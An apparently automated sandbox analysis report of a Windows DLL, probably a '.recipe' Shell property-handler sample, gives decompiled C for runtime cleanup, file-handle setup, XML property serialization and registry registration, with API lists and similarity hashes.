                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E10007337(void* __eax, void* __ebx) {
                                          				intOrPtr _t5;
                                          				intOrPtr _t6;
                                          				intOrPtr _t7;
                                          				LONG* _t8;
                                          				void* _t9;
                                          				void* _t14;
                                          				void* _t24;
                                          				intOrPtr* _t25;
                                          				intOrPtr* _t26;
                                          
                                          				_t14 = __ebx;
                                          				__imp__DecodePointer( *0x10014d88);
                                          				_t25 =  *0x100132dc; // 0x0
                                          				_t24 = __eax;
                                          				if(_t25 != 0) {
                                          					while( *_t25 != 0) {
                                          						E10004732( *_t25);
                                          						_t25 = _t25 + 4;
                                          						if(_t25 != 0) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					_t25 =  *0x100132dc; // 0x0
                                          				}
                                          				_push(_t14);
                                          				E10004732(_t25);
                                          				_t26 =  *0x100132d8; // 0x0
                                          				 *0x100132dc = 0;
                                          				if(_t26 != 0) {
                                          					while( *_t26 != 0) {
                                          						E10004732( *_t26);
                                          						_t26 = _t26 + 4;
                                          						if(_t26 != 0) {
                                          							continue;
                                          						}
                                          						break;
                                          					}
                                          					_t26 =  *0x100132d8; // 0x0
                                          				}
                                          				E10004732(_t26);
                                          				 *0x100132d8 = 0;
                                          				E10004732( *0x100132d4);
                                          				_t5 = E10004732( *0x100132d0);
                                          				 *0x100132d4 = 0;
                                          				 *0x100132d0 = 0;
                                          				if(_t24 != 0xffffffff) {
                                          					_t5 = E10004732(_t24);
                                          				}
                                          				__imp__EncodePointer(0);
                                          				 *0x10014d88 = _t5;
                                          				_t6 =  *0x10013c1c; // 0x0
                                          				if(_t6 != 0) {
                                          					E10004732(_t6);
                                          					 *0x10013c1c = 0;
                                          				}
                                          				_t7 =  *0x10013c20; // 0x0
                                          				if(_t7 != 0) {
                                          					E10004732(_t7);
                                          					 *0x10013c20 = 0;
                                          				}
                                          				_t8 = InterlockedDecrement( *0x10012394);
                                          				if(_t8 == 0) {
                                          					_t8 =  *0x10012394; // 0x10012690
                                          					if(_t8 != 0x10012690) {
                                          						_t9 = E10004732(_t8);
                                          						 *0x10012394 = 0x10012690;
                                          						return _t9;
                                          					}
                                          				}
                                          				return _t8;
                                          			}


                                          APIs
                                          • DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
                                          • _free.LIBCMT ref: 10007358
                                            • Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
                                            • Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758
                                          • _free.LIBCMT ref: 1000736B
                                          • _free.LIBCMT ref: 10007389
                                          • _free.LIBCMT ref: 1000739B
                                          • _free.LIBCMT ref: 100073AC
                                          • _free.LIBCMT ref: 100073B7
                                          • _free.LIBCMT ref: 100073D1
                                          • EncodePointer.KERNEL32(00000000), ref: 100073D8
                                          • _free.LIBCMT ref: 100073ED
                                          • _free.LIBCMT ref: 10007403
                                          • InterlockedDecrement.KERNEL32 ref: 10007415
                                          • _free.LIBCMT ref: 1000742F
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                          • String ID:
                                          • API String ID: 4264854383-0
                                          • Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                          • Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
                                          • Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                          • Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 55%
                                          			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                          				signed int _v8;
                                          				char _v528;
                                          				char _v1048;
                                          				void* _v1052;
                                          				void* _v1056;
                                          				char _v1060;
                                          				void* _v1064;
                                          				char _v1068;
                                          				char _v1084;
                                          				char _v1100;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t63;
                                          				char* _t67;
                                          				intOrPtr* _t71;
                                          				char _t72;
                                          				intOrPtr _t75;
                                          				intOrPtr* _t76;
                                          				intOrPtr _t80;
                                          				intOrPtr* _t81;
                                          				intOrPtr* _t83;
                                          				intOrPtr _t84;
                                          				intOrPtr* _t85;
                                          				intOrPtr _t86;
                                          				intOrPtr* _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t93;
                                          				intOrPtr* _t94;
                                          				intOrPtr _t95;
                                          				intOrPtr _t98;
                                          				intOrPtr _t100;
                                          				intOrPtr _t104;
                                          				intOrPtr* _t109;
                                          				intOrPtr _t110;
                                          				intOrPtr _t112;
                                          				intOrPtr* _t113;
                                          				void* _t115;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t129;
                                          				intOrPtr* _t130;
                                          				intOrPtr* _t132;
                                          				intOrPtr* _t136;
                                          				signed int _t138;
                                          				intOrPtr _t152;
                                          
                                          				_t63 =  *0x10012158; // 0x8bc2c1c1
                                          				_v8 = _t63 ^ _t138;
                                          				_t137 = _a4;
                                          				_t136 = _a8;
                                          				_t115 = __ecx;
                                          				E100043E0( &_v528, 0, 0x208);
                                          				_t67 =  &_v528;
                                          				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
                                          				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
                                          					L25:
                                          					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
                                          				} else {
                                          					_t71 =  *((intOrPtr*)(_t115 + 0x18));
                                          					_t134 =  &_v1064;
                                          					_v1064 = 0;
                                          					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
                                          					if(_t72 != 0) {
                                          						_t137 = 0x8000ffff;
                                          						L24:
                                          						__imp__CoTaskMemFree(_v1068);
                                          						goto L25;
                                          					}
                                          					_t120 = _v1064;
                                          					_t134 =  &_v1060;
                                          					_v1060 = _t72;
                                          					_v1056 = _t120;
                                          					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
                                          					_t137 = _t75;
                                          					if(_t75 == 0) {
                                          						L6:
                                          						if(_t152 < 0) {
                                          							L22:
                                          							_t76 = _v1064;
                                          							 *((intOrPtr*)( *_t76 + 8))(_t76);
                                          							goto L24;
                                          						}
                                          						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
                                          						_t137 = _t80;
                                          						if(_t80 < 0) {
                                          							L21:
                                          							_t81 = _v1060;
                                          							 *((intOrPtr*)( *_t81 + 8))(_t81);
                                          							goto L22;
                                          						}
                                          						_v1056 = 0;
                                          						if( *_t136 == 0) {
                                          							_t83 = _v1060;
                                          							_t134 =  &_v1048;
                                          							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
                                          							_t137 = _t84;
                                          							if(_t84 != 0) {
                                          								goto L21;
                                          							}
                                          							_t85 = _v1060;
                                          							_t134 =  &_v1052;
                                          							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
                                          							_t137 = _t86;
                                          							if(_t86 < 0) {
                                          								L20:
                                          								_t87 = _v1056;
                                          								 *((intOrPtr*)( *_t87 + 8))(_t87);
                                          								goto L21;
                                          							}
                                          							L19:
                                          							_t89 = _v1052;
                                          							 *((intOrPtr*)( *_t89 + 8))(_t89);
                                          							goto L20;
                                          						}
                                          						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
                                          						_t137 = _t93;
                                          						if(_t93 < 0) {
                                          							goto L21;
                                          						}
                                          						_t94 = _v1056;
                                          						_t134 =  &_v1052;
                                          						_v1052 = 0;
                                          						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
                                          						_t137 = _t95;
                                          						if(_t95 < 0) {
                                          							goto L20;
                                          						}
                                          						asm("xorps xmm0, xmm0");
                                          						asm("movq [ebp-0x448], xmm0");
                                          						asm("movq [ebp-0x440], xmm0");
                                          						_t98 = E10002390( &_v528,  &_v1100);
                                          						_t137 = _t98;
                                          						if(_t98 >= 0) {
                                          							asm("xorps xmm0, xmm0");
                                          							asm("movq [ebp-0x438], xmm0");
                                          							asm("movq [ebp-0x430], xmm0");
                                          							_t100 = E10002390(_v1068,  &_v1084);
                                          							_t136 = __imp__#9;
                                          							_t137 = _t100;
                                          							if(_t100 >= 0) {
                                          								_t129 = _v1052;
                                          								asm("movq xmm0, [ebp-0x448]");
                                          								_t134 =  *_t129;
                                          								asm("movq [eax], xmm0");
                                          								asm("movq xmm0, [ebp-0x440]");
                                          								asm("movq [eax+0x8], xmm0");
                                          								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
                                          								_t137 = _t104;
                                          								if(_t104 >= 0) {
                                          									_t130 = _v1052;
                                          									asm("movq xmm0, [ebp-0x438]");
                                          									_t134 =  *_t130;
                                          									asm("movq [eax], xmm0");
                                          									asm("movq xmm0, [ebp-0x430]");
                                          									asm("movq [eax+0x8], xmm0");
                                          									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
                                          								}
                                          								 *_t136( &_v1084);
                                          							}
                                          							 *_t136( &_v1100);
                                          						}
                                          						goto L19;
                                          					}
                                          					_t109 =  *((intOrPtr*)(_t115 + 0x18));
                                          					_t134 =  &_v1052;
                                          					_v1052 = 0;
                                          					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
                                          					_t137 = _t110;
                                          					if(_t110 < 0) {
                                          						goto L22;
                                          					}
                                          					_t132 = _v1056;
                                          					_t134 =  &_v1060;
                                          					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
                                          					_t137 = _t112;
                                          					_t113 = _v1052;
                                          					 *((intOrPtr*)( *_t113 + 8))(_t113);
                                          					_t152 = _t112;
                                          					goto L6;
                                          				}
                                          			}

                                          0x1000317e
                                          0x10003184
                                          0x1000318c
                                          0x10003198
                                          0x1000319c
                                          0x100031a5
                                          0x100031aa
                                          0x100031b0
                                          0x100031b4
                                          0x100031b6
                                          0x100031bc
                                          0x100031c4
                                          0x100031d0
                                          0x100031d4
                                          0x100031dd
                                          0x100031e8
                                          0x100031e8
                                          0x100031f1
                                          0x100031f1
                                          0x100031fa
                                          0x100031fa
                                          0x00000000
                                          0x10003144
                                          0x10003029
                                          0x1000302c
                                          0x10003033
                                          0x10003045
                                          0x1000304b
                                          0x1000304f
                                          0x00000000
                                          0x00000000
                                          0x10003055
                                          0x1000305b
                                          0x1000306b
                                          0x1000306e
                                          0x10003070
                                          0x10003079
                                          0x1000307c
                                          0x00000000
                                          0x1000307c

                                          APIs
                                          • _memset.LIBCMT ref: 10002F9C
                                          • PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1
                                            • Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                            • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                            • Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
                                            • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                            • Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                            • Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6
                                          • VariantClear.OLEAUT32(?), ref: 100031F1
                                          • VariantClear.OLEAUT32(?), ref: 100031FA
                                          • CoTaskMemFree.OLE32(?), ref: 1000327D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
                                          • String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
                                          • API String ID: 2822920939-4160240301
                                          • Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                          • Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
                                          • Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                          • Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int* _t81;
                                          				void* _t86;
                                          				long _t90;
                                          				intOrPtr _t94;
                                          				signed int _t98;
                                          				signed int _t99;
                                          				signed char _t103;
                                          				intOrPtr* _t105;
                                          				intOrPtr _t106;
                                          				intOrPtr* _t109;
                                          				signed char _t111;
                                          				long _t119;
                                          				signed int _t130;
                                          				signed int* _t134;
                                          				intOrPtr _t135;
                                          				signed int* _t138;
                                          				void** _t139;
                                          				intOrPtr _t141;
                                          				void* _t142;
                                          				signed int _t143;
                                          				void** _t147;
                                          				signed int _t149;
                                          				void* _t150;
                                          				void** _t154;
                                          				void* _t155;
                                          
                                          				_push(0x64);
                                          				_push(0x10010d68);
                                          				E10008040(__ebx, __edi, __esi);
                                          				E100091AB(0xb);
                                          				_t130 = 0;
                                          				 *(_t155 - 4) = 0;
                                          				if( *0x10014c80 == 0) {
                                          					_push(0x40);
                                          					_t141 = 0x20;
                                          					_push(_t141);
                                          					_t81 = E10007F1D();
                                          					_t134 = _t81;
                                          					 *(_t155 - 0x24) = _t134;
                                          					if(_t134 != 0) {
                                          						 *0x10014c80 = _t81;
                                          						 *0x10014c64 = _t141;
                                          						while(_t134 <  &(_t81[0x200])) {
                                          							_t134[1] = 0xa00;
                                          							 *_t134 =  *_t134 | 0xffffffff;
                                          							_t134[2] = _t130;
                                          							_t134[9] = _t134[9] & 0x00000080;
                                          							_t134[9] = _t134[9] & 0x0000007f;
                                          							_t134[9] = 0xa0a;
                                          							_t134[0xe] = _t130;
                                          							_t134[0xd] = _t130;
                                          							_t134 =  &(_t134[0x10]);
                                          							 *(_t155 - 0x24) = _t134;
                                          							_t81 =  *0x10014c80;
                                          						}
                                          						GetStartupInfoW(_t155 - 0x74);
                                          						if( *((short*)(_t155 - 0x42)) == 0) {
                                          							while(1) {
                                          								L31:
                                          								 *(_t155 - 0x2c) = _t130;
                                          								if(_t130 >= 3) {
                                          									break;
                                          								}
                                          								_t147 =  *0x10014c80 + (_t130 << 6);
                                          								 *(_t155 - 0x24) = _t147;
                                          								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
                                          									_t147[1] = 0x81;
                                          									if(_t130 != 0) {
                                          										_t66 = _t130 - 1; // -1
                                          										asm("sbb eax, eax");
                                          										_t90 =  ~_t66 + 0xfffffff5;
                                          									} else {
                                          										_t90 = 0xfffffff6;
                                          									}
                                          									_t142 = GetStdHandle(_t90);
                                          									if(_t142 == 0xffffffff || _t142 == 0) {
                                          										L47:
                                          										_t147[1] = _t147[1] | 0x00000040;
                                          										 *_t147 = 0xfffffffe;
                                          										_t94 =  *0x10013c48; // 0x0
                                          										if(_t94 != 0) {
                                          											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
                                          										}
                                          										goto L49;
                                          									} else {
                                          										_t98 = GetFileType(_t142);
                                          										if(_t98 == 0) {
                                          											goto L47;
                                          										}
                                          										 *_t147 = _t142;
                                          										_t99 = _t98 & 0x000000ff;
                                          										if(_t99 != 2) {
                                          											if(_t99 != 3) {
                                          												L46:
                                          												_t70 =  &(_t147[3]); // -268520564
                                          												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
                                          												_t147[2] = _t147[2] + 1;
                                          												goto L49;
                                          											}
                                          											_t103 = _t147[1] | 0x00000008;
                                          											L45:
                                          											_t147[1] = _t103;
                                          											goto L46;
                                          										}
                                          										_t103 = _t147[1] | 0x00000040;
                                          										goto L45;
                                          									}
                                          								} else {
                                          									_t147[1] = _t147[1] | 0x00000080;
                                          									L49:
                                          									_t130 = _t130 + 1;
                                          									continue;
                                          								}
                                          							}
                                          							 *(_t155 - 4) = 0xfffffffe;
                                          							E100079DD();
                                          							L2:
                                          							_t86 = 1;
                                          							L3:
                                          							return E10008085(_t86);
                                          						}
                                          						_t105 =  *((intOrPtr*)(_t155 - 0x40));
                                          						if(_t105 == 0) {
                                          							goto L31;
                                          						}
                                          						_t135 =  *_t105;
                                          						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                          						_t106 = _t105 + 4;
                                          						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                          						 *(_t155 - 0x20) = _t106 + _t135;
                                          						if(_t135 >= 0x800) {
                                          							_t135 = 0x800;
                                          							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
                                          						}
                                          						_t149 = 1;
                                          						 *(_t155 - 0x30) = 1;
                                          						while( *0x10014c64 < _t135) {
                                          							_t138 = E10007F1D(_t141, 0x40);
                                          							 *(_t155 - 0x24) = _t138;
                                          							if(_t138 != 0) {
                                          								0x10014c80[_t149] = _t138;
                                          								 *0x10014c64 =  *0x10014c64 + _t141;
                                          								while(_t138 <  &(0x10014c80[_t149][0x200])) {
                                          									_t138[1] = 0xa00;
                                          									 *_t138 =  *_t138 | 0xffffffff;
                                          									_t138[2] = _t130;
                                          									_t138[9] = _t138[9] & 0x00000080;
                                          									_t138[9] = 0xa0a;
                                          									_t138[0xe] = _t130;
                                          									_t138[0xd] = _t130;
                                          									_t138 =  &(_t138[0x10]);
                                          									 *(_t155 - 0x24) = _t138;
                                          								}
                                          								_t149 = _t149 + 1;
                                          								 *(_t155 - 0x30) = _t149;
                                          								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                          								continue;
                                          							}
                                          							_t135 =  *0x10014c64;
                                          							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
                                          							break;
                                          						}
                                          						_t143 = _t130;
                                          						 *(_t155 - 0x2c) = _t143;
                                          						_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                          						_t139 =  *(_t155 - 0x20);
                                          						while(_t143 < _t135) {
                                          							_t150 =  *_t139;
                                          							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
                                          								L26:
                                          								_t143 = _t143 + 1;
                                          								 *(_t155 - 0x2c) = _t143;
                                          								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                          								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                          								_t139 =  &(_t139[1]);
                                          								 *(_t155 - 0x20) = _t139;
                                          								continue;
                                          							} else {
                                          								_t111 =  *_t109;
                                          								if((_t111 & 0x00000001) == 0) {
                                          									goto L26;
                                          								}
                                          								if((_t111 & 0x00000008) != 0) {
                                          									L24:
                                          									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                                          									 *(_t155 - 0x24) = _t154;
                                          									 *_t154 =  *_t139;
                                          									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                          									_t38 =  &(_t154[3]); // 0xd
                                          									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                          									_t154[2] = _t154[2] + 1;
                                          									_t139 =  *(_t155 - 0x20);
                                          									L25:
                                          									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
                                          									goto L26;
                                          								}
                                          								_t119 = GetFileType(_t150);
                                          								_t139 =  *(_t155 - 0x20);
                                          								if(_t119 == 0) {
                                          									goto L25;
                                          								}
                                          								goto L24;
                                          							}
                                          						}
                                          						goto L31;
                                          					}
                                          					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
                                          					_t86 = 0;
                                          					goto L3;
                                          				}
                                          				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
                                          				goto L2;
                                          			}





























                                          APIs
                                          • __lock.LIBCMT ref: 10007727
                                            • Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
                                            • Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
                                            • Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
                                          • __calloc_crt.LIBCMT ref: 1000775E
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
                                          • GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
                                          • __calloc_crt.LIBCMT ref: 10007819
                                          • GetFileType.KERNEL32 ref: 10007860
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
                                          • GetStdHandle.KERNEL32(-000000F6), ref: 10007952
                                          • GetFileType.KERNEL32 ref: 10007964
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                          • String ID:
                                          • API String ID: 301580142-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 55%
                                          			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
                                          				signed int _v8;
                                          				short _v10;
                                          				long _v1032;
                                          				intOrPtr _v1036;
                                          				intOrPtr _v1040;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t20;
                                          				int _t26;
                                          				wchar_t* _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t37;
                                          				void* _t40;
                                          				WCHAR* _t41;
                                          				short _t42;
                                          				signed int _t44;
                                          				void* _t48;
                                          				short _t52;
                                          
                                          				_t20 =  *0x10012158; // 0x8bc2c1c1
                                          				_v8 = _t20 ^ _t44;
                                          				_t37 = _a8;
                                          				_v1036 = _a4;
                                          				_t41 = _a12;
                                          				_v1040 = _a16;
                                          				_t42 = 0;
                                          				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
                                          				if(_t26 < 0) {
                                          					L4:
                                          					_t42 = 0x8007007a;
                                          					goto L5;
                                          				} else {
                                          					_t48 = _t26 - 0x1ff;
                                          					if(_t48 > 0) {
                                          						goto L4;
                                          					} else {
                                          						if(_t48 == 0) {
                                          							L5:
                                          							_v10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t42 >= 0) {
                                          					_t32 =  &_v1032;
                                          					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
                                          					_t42 = _t32;
                                          					if(_t42 > 0) {
                                          						_t52 = _t42;
                                          					}
                                          					if(_t52 >= 0) {
                                          						_t33 = _v1036;
                                          						if( *((char*)(_t33 + 0x26a)) == 0) {
                                          							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
                                          							if(_t33 == 0) {
                                          								L14:
                                          								 *((char*)(_v1036 + 0x26a)) = 1;
                                          							} else {
                                          								_t37 = StrStrIW;
                                          								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
                                          									goto L14;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
                                          			}


                                          APIs
                                          • vswprintf.LIBCMT ref: 10003441
                                            • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                          • lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
                                          • RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
                                          • StrCmpNICW.SHLWAPI(8BC2C1C1,Software\Classes\%s,00000013), ref: 100034BA
                                          • StrStrIW.SHLWAPI(8BC2C1C1,PropertyHandlers), ref: 100034D0
                                          • StrStrIW.SHLWAPI(8BC2C1C1,KindMap), ref: 100034DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Value__vsnwprintf_llstrlenvswprintf
                                          • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                          • API String ID: 1581644826-984809517
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
                                          				signed int _v8;
                                          				short _v10;
                                          				long _v1032;
                                          				intOrPtr _v1036;
                                          				intOrPtr _v1040;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t19;
                                          				int _t25;
                                          				wchar_t* _t30;
                                          				intOrPtr _t31;
                                          				intOrPtr _t35;
                                          				void* _t38;
                                          				WCHAR* _t39;
                                          				short _t40;
                                          				signed int _t42;
                                          				void* _t46;
                                          				short _t50;
                                          
                                          				_t19 =  *0x10012158; // 0x8bc2c1c1
                                          				_v8 = _t19 ^ _t42;
                                          				_t35 = _a8;
                                          				_v1036 = _a4;
                                          				_t39 = _a12;
                                          				_v1040 = _a16;
                                          				_t40 = 0;
                                          				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
                                          				if(_t25 < 0) {
                                          					L4:
                                          					_t40 = 0x8007007a;
                                          					goto L5;
                                          				} else {
                                          					_t46 = _t25 - 0x1ff;
                                          					if(_t46 > 0) {
                                          						goto L4;
                                          					} else {
                                          						if(_t46 == 0) {
                                          							L5:
                                          							_v10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t40 >= 0) {
                                          					_t30 =  &_v1032;
                                          					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
                                          					_t40 = _t30;
                                          					if(_t40 > 0) {
                                          						_t50 = _t40;
                                          					}
                                          					if(_t50 >= 0) {
                                          						_t31 = _v1036;
                                          						if( *((char*)(_t31 + 0x26a)) == 0) {
                                          							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
                                          							if(_t31 == 0) {
                                          								L14:
                                          								 *((char*)(_v1036 + 0x26a)) = 1;
                                          							} else {
                                          								_t35 = StrStrIW;
                                          								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
                                          									goto L14;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
                                          			}


                                          APIs
                                          • vswprintf.LIBCMT ref: 10003551
                                            • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                          • RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
                                          • StrCmpNICW.SHLWAPI(8BC2C1C1,Software\Classes\%s,00000013), ref: 100035BD
                                          • StrStrIW.SHLWAPI(8BC2C1C1,PropertyHandlers), ref: 100035D3
                                          • StrStrIW.SHLWAPI(8BC2C1C1,KindMap), ref: 100035DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Value__vsnwprintf_lvswprintf
                                          • String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
